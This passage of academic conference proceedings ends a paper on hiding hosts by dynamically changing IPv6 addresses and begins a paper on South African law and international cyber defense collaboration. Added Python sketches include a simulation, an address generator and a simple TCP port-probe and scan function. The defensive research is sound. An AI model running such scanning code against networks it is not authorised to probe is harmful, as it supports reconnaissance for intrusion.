Figure 2 also utilizes a subnet of 256 addresses. The plot illustrates the difference between a static address and addresses that change after an attacker scans r addresses. The address that changes

every round (r=1) follows a binomial distribution. The figure demonstrates that as the frequency of<br />

change approaches the time it takes an attacker to scan a single address, Equation 3 converges to<br />

Equation 2. Alternatively, as the attacker is able to scan more of the address space between address<br />

changes, Equation 3 converges to Equation 1.<br />

Figure 2: The probability an attacker has of detecting a static target address within 256 attempts<br />

versus the probability of detecting an address that changes after an attacker scans r<br />

addresses over z rounds<br />

4.3 Density of address space<br />

The more sparsely populated the address space is, the more difficult it is for an attacker to pinpoint<br />

the target host. The reason for this is that the attacker does not know the address of the target host. If<br />

the attacker knew the address, he/she would not need to scan the subnet. Assuming the attacker has<br />

no additional information pertaining to the identity of a host (e.g., operating system), a successful scan reply gives no indication of whether the host found is the target.

The probability of detecting a host increases with the number of hosts on a subnet. The probability of<br />

detecting a host can be calculated using Equation 1. In Section 4.2, h=1 represented a single target


host. In this case, h is equal to the number of total hosts on the subnet. As already mentioned,<br />

successful detection does not indicate that the host detected is the target host.<br />

This factor degrades an attacker’s capability of detecting a target host. In the single host scenario<br />

discussed in Section 4.2, locating a target takes time. Once the target is located, though, the attacker<br />

knows he/she has identified the target host because there are no other hosts on the subnet. With<br />

multiple hosts on the subnet, an attacker will get false positives. By false positive, we mean that the attacker receives an indication of success when the located host is not the target. The false positive rate

increases with the number of non-target hosts on the subnet. Unlike a password attack where<br />

success provides an attacker access to a machine, a successful scan reply tells the attacker little<br />

about whether the discovered host is the target host. Even in the case of multiple discovered hosts,<br />

the attacker does not know which host is the target. Of course, with additional information, such as<br />

operating system or protocol, the attacker can filter out hosts not matching a certain profile.<br />
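The density argument can be made concrete. The sketch below is ours and assumes Equation 1 generalizes to h occupied addresses via binomial coefficients:

```python
from math import comb

def p_exhaustive(r, n, h):
    """Equation 1 with h occupied addresses: probability that r distinct
    guesses in an n-address subnet hit at least one occupied address."""
    return 1 - comb(n - h, r) / comb(n, r)

# More hosts make *some* reply more likely, but absent fingerprinting a
# reply is the real target with probability only 1/h, so the false
# positive rate rises with subnet density.
for h in (1, 8, 64):
    print(h, round(p_exhaustive(64, 256, h), 3), round(1 / h, 3))
```

The first column of output grows with h while the last shrinks: a denser subnet yields more hits but less certainty about which hit is the target.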

5. Interaction of dynamic address factors<br />

The three factors described in Section 4 are not independent. As certain factors increase, other<br />

factors can decrease while still maintaining the same overall probability of detection. For example,<br />

there is a relationship between address size and frequency of address change. There is also a<br />

relationship between subnet density and frequency of address change.<br />

Increasing the size of the address allows for the frequency of the address change to decrease without<br />

degrading security. As the size of the address increases linearly, the size of the address space<br />

increases exponentially. The increased address space requires more time and resources from an<br />

attacker to exhaustively scan. Beyond a certain address size, an attacker cannot exhaustively scan

the exponentially growing network quickly. Therefore, it is possible for the host to decrease the<br />

frequency of the address change without increasing the probability it will be detected. Since each<br />

address change requires computation on the part of the host, decreasing the frequency of address<br />

change is desirable. A larger address space can result in lower computational requirements with the

same probability of detection as that of a smaller address space with more frequent address changes.<br />

Density of address space also affects frequency of address change. As the density of the address<br />

space increases, the probability of correlating an address with a specific host decreases. The<br />

increased density occurs because more hosts populate the subnet. As mentioned in Section 4.3, a<br />

dense subnet results in a higher probability of an attacker detecting a host that is a false positive.<br />

Therefore, a targeted host can use the dense network to lower the probability of being detected.<br />

Density in the address space also correlates directly with the possibility of address collisions. By

address collision, we mean that a host changes its address to a pre-existing address on the subnet.<br />

Since each host must have a globally unique address to ensure connectivity, address collisions must<br />

be avoided on the subnet. Repeated address collisions could prevent a host from sending or receiving<br />

network traffic, thus decreasing throughput and Quality of Service (QoS). While increased density in<br />

the address space provides a host with a lower probability of detection, address space density must<br />

be balanced with the probability of address collisions to ensure network connectivity.<br />

Address size inversely correlates with the probability of address collisions. It is desirable to have a<br />

subnet populated by multiple hosts to increase the probability of an attacker finding a false positive.<br />

By increasing the address size, the address space increases. A larger address space allows for more<br />

hosts on the subnet without overpopulating the subnet. This means that a larger subnet can be less<br />

densely populated. The result is that a detected host still has the same probability of being a false<br />

positive while a host changing its address has a lower probability of an address collision.<br />
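The trade-off between address size and change frequency can be quantified. The scan rate and tolerated detection probability below are our own illustrative assumptions, not figures from the paper:

```python
import math

SCAN_RATE = 1_000_000   # attacker guesses per second (assumed)
P_MAX = 0.01            # tolerated chance of being found per address lifetime

def max_change_interval(bits):
    """Seconds an address can be kept before the cumulative hit probability
    1 - (1 - 1/N)**g exceeds P_MAX, using the large-N approximation
    g ~ -ln(1 - P_MAX) * N, where N = 2**bits."""
    n = 2 ** bits
    guesses = -math.log1p(-P_MAX) * n  # guesses before P_MAX is reached
    return guesses / SCAN_RATE

for bits in (8, 16, 32, 64):
    print(bits, max_change_interval(bits))
```

Because the allowable interval grows linearly with N, and N grows exponentially with address size, each added address bit doubles how long a host may keep one address at the same risk level.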

6. Simulation results<br />

To validate our analysis of changing addresses in Section 4.2, we simulated four different rates for<br />

addresses to change. The rates simulated were a static address (never changes) and addresses that<br />

changed after an attacker scanned 64 addresses (r=64), eight addresses (r=8), and one address<br />

(r=1). The simulation results are listed in Table 2. The table highlights four search intervals. The four<br />

intervals are 64, 128, 192, and 256 guesses. For each interval, a simulated attacker attempted to<br />

locate a target host with an 8-bit host address within the specified interval. Each interval was<br />

simulated for 100,000 iterations. The probability displayed is the average over the 100,000 iterations.<br />

The probabilities produced match the calculated probabilities at each interval depicted in Figure 2.
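A minimal Monte Carlo version of this experiment (our sketch, with fewer iterations than the paper's 100,000) reproduces the same trends:

```python
import random

def simulate(interval, guesses, n=256, iterations=20_000, seed=1):
    """Fraction of runs in which an attacker scanning `guesses` distinct
    addresses in random order finds the target; the target keeps its
    address if interval is None, otherwise it re-randomizes its address
    every `interval` attacker guesses."""
    rng = random.Random(seed)
    hits = 0
    for _ in range(iterations):
        target = rng.randrange(n)
        for i, guess in enumerate(rng.sample(range(n), guesses)):
            if interval and i and i % interval == 0:
                target = rng.randrange(n)  # the address change
            if guess == target:
                hits += 1
                break
    return hits / iterations

print(round(simulate(None, 64), 3))  # static address, ~0.25
print(round(simulate(1, 256), 3))    # changes every guess, ~0.63
```

The static case converges to r/N and the every-guess case to the binomial limit, matching the first and last rows of Table 2.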


Table 2: Simulated probability of detecting a target host with an 8-bit address within 64, 128, 192, and 256 guesses; each listed probability is the average over 100,000 iterations

                           Probability of detection within:
                           64 guesses  128 guesses  192 guesses  256 guesses
Static Address               0.249       0.503       0.748       1
Changing Address (r=64)      0.248       0.435       0.578       0.682
Changing Address (r=8)       0.225       0.398       0.533       0.637
Changing Address (r=1)       0.222       0.393       0.528       0.632

7. Security through dynamic addressing

Establishing a moving target defense is an effective way of protecting users’ privacy and data.<br />

Changing hosts’ addresses, referred to as dynamic addressing, enhances security. If target<br />

addresses continually change, an attacker loses the expectation of narrowing the search space with<br />

successive guesses. If the attacker is able to locate a targeted host, a dynamically changing host<br />

address limits the time an attacker has access to the host. Since the discovered address changes, the<br />

attacker no longer knows the host’s location on the network. Additionally, the nature of dynamic<br />

addressing prevents other types of targeted attacks, which rely on static addressing.<br />

Changing the addresses of hosts allows them to logically move within the address space or subnet.<br />

As illustrated in Figure 2, the more often an address changes, the more difficult it is to locate and<br />

target the host. A changing address, combined with other factors such as address size and subnet<br />

density, creates a moving target defense. A large address space supporting many hosts remains sparsely populated, making it difficult for an attacker to pinpoint a specific target host. Other network hosts result in false positives for an attacker, while unoccupied address space reduces the possibility of

address collisions. The incorporation of dynamic addressing considerably reduces the probability of<br />

detecting a target host while still maintaining connectivity.<br />

Dynamic addressing also protects against certain classes of network attacks. For example, an<br />

attacker attempting a targeted DoS attack first has to find the target host on the subnet. Even if the<br />

attacker finds the host, the attack is limited by the interval between address changes. Other targeted<br />

network attacks, such as session hijacking and man-in-the-middle, are constrained by the same<br />

limitations as DoS attacks. To attack dynamically addressed hosts, an attacker must be able to either<br />

quickly find the host after an address change or predict the address change. If a sufficiently<br />

randomized dynamic address obscuration algorithm is utilized, targeting hosts in a large address<br />

space should not be possible.<br />

Providing security at the network layer also provides transitive security against attacks and exploits at<br />

layers above the network layer since many other attacks rely on network transmissions. The majority<br />

of application layer security flaws are exploited by either taking control of a system or transferring<br />

sensitive information back to an attacker. By securing the network layer, even if an attacker is able to<br />

identify a valid vector of attack on an application, the window for attack is limited by the frequency of<br />

the address change. Once the address changes, the attacker loses any existing vector to control the<br />

remote host. The attacker must then locate the host to reestablish the connection.<br />

8. Future work<br />

The next phase of our research works to develop a sufficiently randomized algorithm for dynamically<br />

obscuring IP addresses. Our goal is to produce an approach that dynamically changes IP addresses<br />

multiple times within a single session. By changing addresses multiple times within a single session,<br />

an attacker will have more difficulty locating target hosts. Even if an attacker locates the host,<br />


changing addresses multiple times within a session prevents the attacker from capturing enough<br />

network traffic to correlate the nature of a communication between two hosts.<br />

Our particular approach leverages IPv6. As alluded to in Section 4.1, current methods for locating a

target address in an IPv6 subnet are infeasible in a reasonable amount of time. The immense IPv6<br />

address space will also likely be sparsely populated. As discussed in Section 4.3, locating any host in<br />

a sparsely populated address space is probabilistically difficult. In addition to the difficulty of locating<br />

hosts in a sparsely populated subnet, hosts using a dynamic addressing scheme can reasonably<br />

expect not to collide with occupied addresses when rotating their addresses. In order to achieve a<br />

reasonable dynamic addressing algorithm in IPv4, hosts would have to draw from a pool of unused<br />

addresses. Reserving pools of addresses is more difficult given the depletion of the IPv4 address

space (NRO 2010). Additionally, an IPv4 pool of addresses, regardless of how large, would be almost<br />

trivial for an attacker to scan. To achieve a sufficiently randomized dynamic addressing algorithm, we<br />

plan to repeatedly use a cryptographic hash function to obscure the 64-bit interface identifier that<br />

makes up the host portion of an IPv6 address. By using a cryptographic hash function, malicious

hosts cannot feasibly predict the dynamic address (Schneier 1996). Since hosts in IPv6 can generate<br />

and advertise their own addresses (Thomson, Narten & Jinmei 2007), obscuration is kept local.<br />

Localizing obscuration reduces the possibility of a malicious host performing any type of address<br />

hijacking or man-in-the-middle attack. It also reduces the computational overhead that address

generation servers would incur.<br />
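A minimal sketch of such a scheme follows. It is ours, not the authors' (their algorithm is future work), and all names and parameters are illustrative: a local secret is hashed with a counter, and 64 bits of the digest become the interface identifier appended to the /64 prefix.

```python
import hashlib
import ipaddress

def next_address(prefix, secret, counter):
    """Hypothetical dynamic-address generator: derive a fresh 64-bit
    interface identifier from a local secret and a counter, and combine
    it with the /64 network prefix."""
    digest = hashlib.sha256(secret + counter.to_bytes(8, "big")).digest()
    iid = int.from_bytes(digest[:8], "big")  # low 64 bits of the address
    prefix_bits = int(ipaddress.IPv6Address(prefix)) & ~((1 << 64) - 1)
    return ipaddress.IPv6Address(prefix_bits | iid)

a0 = next_address("2001:db8::", b"local-secret", 0)
a1 = next_address("2001:db8::", b"local-secret", 1)
print(a0, a1)  # two addresses in the same /64, unlinkable without the secret
```

Because the secret never leaves the host, an observer who sees one address cannot feasibly predict the next, which is the property the paper requires of a sufficiently randomized obscuration algorithm.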

9. Conclusion<br />

As users exchange more personally identifiable information over the Internet, it is increasingly<br />

important to protect users’ security and privacy. One of the best ways to accomplish this is through<br />

the use of a moving target defense. At the network layer, this can be achieved by dynamically<br />

changing host IP addresses. Frequently changing addresses are probabilistically more difficult to<br />

detect than static addresses. Dynamic addresses also provide an additional layer of security for hosts<br />

that are detected by an attacker. An attacker is unable to compromise hosts for a significant period of<br />

time since the hosts’ network address changes. Dynamically changing addresses provide security and<br />

privacy by creating a moving target solution implementable as low as the network layer of the protocol<br />

stack.<br />

References<br />

Bagnulo, M., & Arkko, J. October 2006. Cryptographically Generated Addresses (CGA) Extension Field Format.<br />

RFC 4581 (Proposed Standard).<br />

Dunlop, M., Groat, S., Marchany, R., & Tront, J., 23-28 January 2011. ‘IPv6: Now You See Me, Now You Don't’,<br />

Proceedings of the Tenth International <strong>Conference</strong> on Networks (ICN 2011), St. Maarten, The Netherlands<br />

Antilles.<br />

Fink, R. A., Brannigan, M. A., Evans, S. A., Almeida, A. M., & Ferguson, S. A. 9 May 2006. Method and<br />

Apparatus for Providing Adaptive Self-Synchronized Dynamic Address Translation, United States Patent<br />

No. US 7,043,633 B1.<br />

GLORIAD. 2010. GLORIAD Average Round Trip Time - Last Week. [Online] Available<br />

http://www.gloriad.org/gloriad/monitor/stats/avg_round_trip_time.week.html. [11 October, 2010].<br />

Johnson, P. C., Kapadia, A., Tsang, P. P., & Smith, S. W. 2007. ‘Nymble: Anonymous IP-Address Blocking’,<br />

Privacy Enhancing Technologies Symposium (PET '07), Ottawa, Canada, pp.113-133.<br />

Koukis, D., Antonatos, S., & Anagnostakis, K. 2006. On the Privacy Risks of Publishing Anonymized IP Network<br />

Traces. Communications and Multimedia Security, 4237: 22-32.<br />

Narten T., Draves, R., & Krishnan, S. September 2007. Privacy Extensions for Stateless Address<br />

Autoconfiguration in IPv6. RFC 4941 (Draft Standard).<br />

NRO. 2010. Remaining IPv4 address space drops below 5%. [Online] Available http://www.nro.net/<br />

media/remaining-ipv4-address-below-5.html, [7 November, 2010].<br />

Reiter, M., & Rubin, A. 1999. ‘Anonymous Web Transactions with Crowds’, Communications of the ACM, vol. 42, no. 2,

pp. 32-48.<br />

Schneier, B. 1996. Applied Cryptography: Protocols, Algorithms, and Source Code in C, 2nd Edition. New York: Wiley.

Sheymov, V. I. 18 February, 2010. Method and Communications and Communication Network Intrusion<br />

Protection Methods and Intrusion Attempt Detection System, United States Patent No. US 2010/0042513<br />

A1.<br />

Shields, C., & Levine, B. N. 2000. ‘A protocol for anonymous communication over the Internet’, Proceedings of<br />

the 7th ACM conference on Computer and communications security, Athens, Greece, pp. 33-42.<br />

Thomson, S., Narten T., & Jinmei, T. September 2007. IPv6 Stateless Address Autoconfiguration. RFC 4862<br />

(Draft Standard).<br />



Changing the Face of Cyber Warfare with International<br />

Cyber Defense Collaboration<br />

Marthie Grobler¹, Joey Jansen van Vuuren¹ and Jannie Zaaiman²
¹Council for Scientific and Industrial Research, Pretoria, South Africa
²University of Venda, South Africa

mgrobler1@csir.co.za<br />

jjvvuuren@csir.co.za<br />

jannie.zaaiman@univen.ac.za<br />

Abstract: The international scope of the internet and the global reach of technological usage require the South

African legislative system to address issues related to the application and implementation of international<br />

legislation. However, legislation in cyberspace is rather complex since the technological revolution and dynamic<br />

technological innovations are often not well suited to any legal system. A further complication is the lack of<br />

comprehensive international cyber defense cooperation treaties. The result is that many countries are not<br />

properly prepared, nor adequately protected by legislation, in the event of a cyber attack on a national level. This<br />

article will address the international cyber defense collaboration problem by looking at the impact of technological<br />

revolution on warfare. Thereafter, the article will evaluate the South African legal system with regard to<br />

international cyber defense collaboration. It will also look at the influence of cyber defense on the international<br />

position of the Government, as well as cyber security and cyber warfare acts and the command and control<br />

aspects thereof. The research presented is largely theoretical in nature, focusing on recent events in the public<br />

international domain.<br />

Keywords: collaboration, cyber defense, legislation, government responsibility<br />

1. Introduction<br />

The international scope of the internet and the global reach of technological usage require the South

African legislative system to address issues related to the application and implementation of<br />

international legislation. However, the complexities of cyberspace and the dynamic nature of<br />

technological innovations require a cyber defense framework that is not well suited to any current legal

system. A further complication is the lack of comprehensive international cyber defense cooperation<br />

treaties, resulting in many countries not being properly prepared, or adequately protected by<br />

legislation, in the event of a cyber attack on a national level.<br />

For the purpose of this article, cyber warfare is defined as the use of exploits in cyber space as a way<br />

to intentionally cause harm to people, assets or economies (Owen 2008). It can further be defined as<br />

the use and management of information in pursuit of a competitive advantage over an opponent,<br />

involving "the collection of tactical information, assurance that one’s own information is valid,<br />

spreading of propaganda or disinformation among the enemy, undermining the quality of opposing<br />

force information and denial of service or of information collection opportunities to opposing forces"<br />

(Williams & Arreymbi 2007).<br />

The article will address some of the aspects related to changing the face of cyber warfare, focusing<br />

specifically on international cyber defense collaboration. It will look at some international technological<br />

revolutions that had an impact on the international legal scope and briefly evaluate the South African<br />

legal system with regard to international cyber defense collaboration. The article will also address<br />

international cyber warfare and the influence of cyber defense on the international position of the<br />

Government. The article will conclude with recommendations on working towards international cyber<br />

defense collaboration.<br />

2. Technological revolutions' impact on warfare<br />

Modern society created both a direct and indirect dependence on information technology, with a<br />

strong reliance on immediacy, access and connections (Williams & Arreymbi 2007). As a result, a<br />

compromise of the confidentiality, availability or integrity of the technological systems could have<br />

dramatic consequences regardless of whether it is the temporary interruption of connectivity, or a<br />

longer-term disruption caused by a cyber attack (Warren 2008).<br />

Battlespace, as implied by military use and warfare, is becoming increasingly difficult to define since<br />

advances in technology have revolutionized the act of war. "Today, cyber attacks can target political

92


Marthie Grobler et al.<br />

leadership, military systems, and average citizens anywhere in the world, during peacetime or war,<br />

with the added benefit of attacker anonymity. The nature of a national security threat has not<br />

changed, but the Internet has provided a new delivery mechanism that can increase the speed,<br />

diffusion, and power of an attack." (Geers ND). Although the physical destruction of the internet<br />

infrastructure as a result of cyber warfare is unlikely, a number of technological exploits can be<br />

employed as part of a cyber warfare attack aimed at financial loss. These exploits include:<br />

Probes - an attempt to gain access to a system;<br />

Scans - many probes done using an automated tool;<br />

Account compromise - hacking, or the unauthorized use of a computer account;<br />

Root compromise - compromise of an account with system administration privileges;<br />

Packet sniffing - capturing data from information as it travels over a network;<br />

Denial of service (DoS) attacks - deliberately consuming system resources to deny service to legitimate users; and
Malicious programs and malware - hidden programs that cause unexpected, undesired results on a system (Owen 2008).
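The first two items in the list differ only in automation. The benign localhost sketch below (ours, not part of the original article) makes the distinction concrete: a probe is one connection attempt, a scan is a loop of probes.

```python
import socket

def probe(host, port, timeout=0.5):
    """A single probe: one attempt to reach a service on a host."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        return s.connect_ex((host, port)) == 0  # 0 means the port answered

def scan(host, ports):
    """A scan: many probes driven by an automated loop."""
    return [port for port in ports if probe(host, port)]
```

For example, `scan("127.0.0.1", range(8000, 8010))` returns whichever of those local ports currently accepts TCP connections.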

Technological revolutions in computers and electronics make major advances in weapons and<br />

warfare possible. They also extend to areas such as information processing and networks,

communications, robotics and advanced munitions (O'Hanlon 2000). Technological revolutions enable<br />

countries to prepare offensive and defensive strategies in cyber space.<br />

3. Evaluating the South African legal system with regard to international cyber<br />

defense collaboration<br />

From recent activity, it is clear that the South African Government, the defense environment and

the business environment are becoming increasingly aware of the threats and implications enabled by<br />

the use of the cyber environment. It is also clear that the threats are becoming more sophisticated<br />

and advanced when used as an element of cyber warfare and cyber crime.<br />

The internet is increasingly becoming more volatile and insecure. In fact, cyber terrorists have the<br />

capability to shut down South Africa’s power, disrupt financial transactions, and commit crimes to<br />

finance their physical operations. Organized crime is also increasingly making use of the internet as a<br />

means of communication and financial gain. Therefore, South Africa needs a national cyber defense<br />

system with which everybody must comply.

3.1 The South African legal system<br />

Over the past decade, South Africa has taken the first steps to protect its information. It has passed<br />

legislation starting with the South African Constitution of 1996, which protects privacy, and the ECT<br />

(Electronic Communications and Transactions) Act of 2002, which provides for the facilitation and<br />

regulation of electronic communications and transactions (ECT 2002).<br />

In 2000, the PAIA (Promotion of Access to Information Act) No 2 as amended, was passed to give<br />

effect to Section 32 of the Constitution, subject to justifiable limitations (PAIA Act 2000). These<br />

limitations are aimed at the reasonable protection of privacy, commercial confidentiality and good<br />

governance in a manner that balances the right of access to information with any other rights,<br />

including the rights in the Bill of Rights in Chapter 2 of the Constitution (SA Constitution 1996). Linked<br />

to this Act is the PAIA Reg 187 Regulations regarding the promotion of access to

information (Government Gazette 2003).<br />

In 2002, the RIC (Regulation of Interception of Communications and Provision of Communication-related information) Act was passed to regulate the interception of certain communications, the

monitoring of certain signals and radio frequency spectrums and the provision of certain<br />

communication-related information. This Act also regulates the making of applications for, and the<br />

issuing of, directions authorizing the interception of communications and the provision of<br />

communication-related information under certain circumstances (RIC Act 2002).<br />

Towards the end of 2009, the South African Government passed two bills, namely the:<br />


PPI (Protection of Personal Information) Bill that introduces brand new legislation to ensure that<br />

the personal information of individuals is protected, regardless of whether it is processed by public<br />

or private bodies (Giles 2010).<br />

Information Bill that is meant to replace an existing piece of legislation, the Protection of<br />

Information Act of 1982. It deals with the protection of State information and empowers the<br />

government to classify certain information in order to protect the national interest from suspected<br />

espionage and other hostile activities (Republic of South Africa 2010).<br />

International standards also play an important role in the South African legal system. ISO/IEC 27002

is an information security standard published by the International Organization for Standardization<br />

(ISO) and the International Electrotechnical Commission (IEC), originally published as ISO/IEC<br />

17799:2005. It is entitled Information technology - Security techniques - Code of practice for<br />

information security management. This standard has been accepted by and adopted in South Africa<br />

(International Standards Organization 2008).<br />

South Africa has also adopted the Council of Europe Cyber Crime Treaty in Budapest in 2001 but has<br />

not ratified it yet. The treaty contains important provisions to assist law enforcement in their fight<br />

against transborder cyber crime. Therefore, it is imperative that South Africa ratifies the cyber crime<br />

treaty to avoid becoming an easy target for international cyber crime. The ratification will hopefully be<br />

done soon, although the South African government seems to be presently focused on basic service<br />

delivery and more traditional crimes given the current local crime situation. However, steps to<br />

establish the Computer Security Incident Response Team (CSIRT) indicate that the aim to tackle<br />

cybercrime is gathering momentum.<br />

3.2 The South African position on international cyber defense collaboration<br />

In February 2010, South Africa published a draft Cyber security policy that would set a framework for<br />

the creation of relevant structures, boost international cooperation, build national capacity and<br />

promote compliance with appropriate cyber crime standards. Over the last five years, South Africa<br />

focused on modernizing and expanding information technology equipment, applications, and<br />

centralized hosting capabilities and network infrastructure. This was done as part of its strategy to<br />

fully modernize and integrate the national criminal justice system to the maximum benefit of society<br />

and at minimum cost to crime prevention agencies. This policy has not been adopted, but provides a<br />

first step from South Africa towards international cyber defense collaboration.<br />

In a more recent move towards international cyber defense collaboration, South Africa participated in

the 12 th United Nations Congress on Crime Prevention and Criminal Justice in Salvador, Brazil during<br />

April 2010. During this congress, delegates considered the best possible responses to cyber crime as<br />

the Congress Committee took up the dark side of advances in Information Technology. While<br />

advances in information technology held many benefits for society, its dark underside (computer-based fraud and forgery, illegal interception of private communications, interference with data and

misuse of electronic devices) requires States to develop an organized, international response.<br />

Speakers at the congress remained undecided about the nature of the required response, with<br />

supporters of the Council of Europe’s Budapest Convention on Cybercrime suggesting an expansion of the treaty, and others suggesting new multilateral negotiations (UN Information Officer 2010).

In general, governments are having a tough time keeping pace, and their responses to cyber crime are sadly lacking. In many countries, cyber crime damages economies and State credibility and further impedes national development. Cooperation in stamping out cyber crime and protecting countries against cyber warfare is vital at all levels of defense, law enforcement, the judiciary and the private sector.

According to Markoff (2010), a group of cyber security specialists and diplomats, representing 15<br />

countries (including South Africa) has agreed on a set of recommendations to the United Nations'<br />

Secretary General for negotiations on an international computer security treaty. In recent years, an<br />

explosion in cyber crime has been accompanied by an arms race in cyber weapons, as dozens of<br />

nations have begun to view computer networks as arenas for espionage and warfare. The<br />

recommendations to the United Nations from the specialists and diplomats reflect an effort to find<br />

ways to address the dangers of the anonymous nature of the Internet, such as the target of a cyber attack misidentifying the attacker. Among the troubling issues is the existence of

proxies. The report also suggests that “the same laws that apply to the use of kinetic weapons should<br />


apply to state behavior in cyber space.” (Markoff 2010). The report recommends five steps to improve<br />

international cyber cooperation and security:<br />

Having more discussions about the ways different nations view and protect their computer<br />

networks, including the Internet;<br />

Discussing the use of computer and communications technologies during warfare;<br />

Sharing national approaches on legislation about computer security;<br />

Finding ways to improve the Internet capacity of less developed countries; and<br />

Negotiating to establish common terminology to improve the communications about computer<br />

networks (Markoff 2010).<br />

The signers of the report include the major cyber powers and a number of other nations: the United States, Belarus,

Brazil, Britain, China, Estonia, France, Germany, India, Israel, Italy, Qatar, Russia, South Africa and<br />

South Korea. From a legal perspective, a number of concerns can be identified, such as:<br />

- Lack of collaboration between industry and the defense environment;<br />

- Capacity of the legal fraternity to comprehend the complexity of the cyber environment and to deliver a verdict based on a thorough understanding of the facts;<br />

- Collaboration between countries and agreement on protocols;<br />

- Lack of collaboration between State Departments on cyber warfare and cyber crime;<br />

- Lack of collaboration between municipalities, districts, regions and provinces; and<br />

- Lack of collaboration between urban and tribal authorities.<br />

Networked computers now control everything, including bank accounts, stock exchanges, power<br />

grids, defence systems, the justice system and government. Networked computers also control all health<br />

records and crucial personal data. From a single computer an entire nation can be brought down. The<br />

authors are of the opinion that a series of regional conferences with all stakeholders involved and<br />

sponsored by the private sector should be conducted. Significant progress has been made in South<br />

Africa, but commitments are required to draft a comprehensive Charter for South Africa and its unique<br />

situation.<br />

4. International cyber warfare<br />

The North Atlantic Treaty Organization (NATO) is only just beginning to recognize that the Internet<br />

has become a new battleground that also requires a military strategy. To counter such threats, a<br />

group of NATO members established a cyber defense centre in Tallinn. The 30 staffers at the<br />

Cooperative Cyber Defense Centre of Excellence analyze emerging viruses and other threats and<br />

pass on alerts to sponsoring NATO governments. Experts on military, technology, law and science<br />

are wrestling with such questions as: what qualifies as a cyber attack on a NATO member, and so<br />

triggers the obligation of alliance members to rush to its defense; how can the alliance defend itself in<br />

cyber space? Answers to these questions are strikingly different: Washington creates new funds for<br />

cyber defenses; Estonia is aiming to create a nation of citizens alert and wise to online threats (NATO<br />

ND).<br />

The choice of Estonia as the home to NATO’s new cyber war brain trust is not accidental. In 2007,<br />

Estonia suddenly found itself in the midst of cyber attacks. The fact that this happened in Estonia, a<br />

proud digital society, was eye opening. Back in 2007, Estonia’s minister of defense stated that the<br />

attacks could not be treated as hooliganism, but as an attack against the State. Nevertheless, no troops<br />

crossed Estonia’s borders, and there was nothing that could be regarded as a conventional conflict.<br />

The United States clearly wants to take a military strategy approach. Estonia, on the other hand,<br />

prefers to demilitarize the issue by educating citizens on how to identify risks and promote a culture of<br />

cyber security, starting with schoolchildren. The Estonians have the right idea. A society of savvy<br />

citizens is the best defense (Geers ND).<br />

In response to the cyber attacks on Estonia in 2007 and on Georgia in 2008, NATO set up a coordinated cyber<br />

defense policy with a quick-reaction cyber team on permanent standby. This, however, has not<br />

stopped the constant attack on NATO computers (Gardner 2009).<br />

5. Influence of cyber defense on the international position of Governments<br />

The opinion of United States Department of Defense (DOD) officials is that cyber space is a domain<br />

available for warfare, similar to air, space, land, and sea (Wilson 2007). As a result, any cyber attacks<br />

can have either a direct or an indirect influence on the DOD. Accordingly, the DOD needs to consider<br />

the potential effects of an emerging military-technological revolution that will have profound effects on<br />

the way wars are fought. Growing evidence exists that over the next several decades, existing military<br />

systems and operations will be superseded by new, far more capable means and methods of warfare<br />

employed by new or greatly modified military organizations (Krepinevich 2003).<br />

The DOD views information itself as both a weapon and a target in warfare. In addition, it provides the<br />

ability to disseminate persuasive information rapidly in order to directly influence the decision making<br />

of diverse audiences. By incorporating the cyber domain in the cyber defense structure, a number of<br />

new aspects come into play that may have an influence on the manner in which the DOD reacts to<br />

cyber attacks:<br />

- New national security policy issues;<br />

- Consideration of psychological operations used to affect friendly nations or domestic audiences; and<br />

- Possible accusations against the State of war crimes if offensive military computer operations or electronic warfare tools severely disrupt critical civilian computer systems, or the systems of non-combatant nations (Wilson 2007).<br />

As an example of the last point: if wrongful acts are committed inside a country, the State can be<br />

held responsible for those acts, since the State is obliged to protect the interests of the entire<br />

international community. If a representative of a State organ or a private person acting on the State's<br />

behalf committed an act, the act may be attributed to the State (Article 3 ILC Draft Articles). The<br />

physical location of a computer or hardware used in a cyber attack does not (and should not) allow for<br />

attributing that cyber attack to a particular State. Such an assumption would be greatly unjustified,<br />

since a State does not carry the responsibility for actions of its residents operating hardware located<br />

within its territory.<br />

The State, however, can be held responsible in the light of existing international law doctrine, for a<br />

breach of an international obligation. This obligation relates not to actions but to omissions, i.e. to not<br />

preventing the attack from taking place. This interpretation is derived from the wording of Article 14(3) of<br />

the International Law Commission (ILC) Draft Articles, which provides that a State may be held<br />

responsible for the conduct of organs of an insurrectional movement, if such an attribution is<br />

legitimate under international law. The State has therefore an obligation to show best efforts, and to<br />

take all “reasonable and necessary” measures in order to prevent a given incident from happening. The<br />

occurrence of this obligation was best reflected in the International Court of Justice (ICJ) case<br />

concerning the United States diplomatic and consular staff in Teheran. In its decision, the ICJ found<br />

that the overrunning of the United States embassy in Teheran does not free Iran from responsibility<br />

for that incident, although it also cannot be attributed to Iran (Kulesza 2010).<br />

The State is also responsible for providing sufficient international protection from cyber attacks<br />

conducted by its residents from its territory. It is the duty of any State from whose territory an<br />

internationally wrongful act is conducted to cooperate with the victim’s State and to prevent future<br />

similar harmful deeds. If the State itself is not capable of protecting the interests of another sovereign,<br />

it may also not allow for private persons acting from within its territory to inflict damage or create<br />

danger to the other State while they are protected by its immunity. Under such an interpretation,<br />

Russia’s refusal to prosecute the perpetrators of the attack against Estonia would constitute an<br />

internationally wrongful act, while Israel’s prosecution and punishment of the actors behind the Solar<br />

Sunrise attack on United States Air Force databases, conducted through a Texas internet provider, exonerates<br />

it from any international responsibility (Kulesza 2010).<br />

In this light, it is therefore the obligation of the South African government to launch and support<br />

awareness projects to prevent these attacks from inside its borders. This also includes the<br />

establishment of a CSIRT, as proposed in the draft South African Cyber security policy. Currently,<br />

South Africa is one of only a handful of countries that does not have a running CSIRT, putting South<br />

Africa in a disadvantaged position with regard to cyber attack and defense (FIRST 2009).<br />


6. Working towards international cyber defense collaboration<br />

Cyber warfare is an emerging form of warfare not explicitly addressed by existing international law.<br />

While most agree that legal restrictions should apply to cyber warfare, the international community<br />

has yet to reach consensus on how international humanitarian law (IHL) applies to this new form of<br />

conflict (Kelsey 2008). In particular, there is a need for an international consensus on the due<br />

diligence criteria which have to be fulfilled by a State in order to avoid international responsibility for<br />

failing to protect other sovereigns from cyber attacks conducted from its territory.<br />

Another crucial issue would be to establish the standards for releasing a State from any international<br />

responsibility for not providing due diligence: would the adoption of specific provisions in national<br />

criminal laws be sufficient or would State authorities need to initiate a criminal investigation<br />

effectively? It should also be clarified whether a due diligence standard can be set post factum – after<br />

an attack has already taken place (Kulesza 2010). In South Africa, this is not possible.<br />

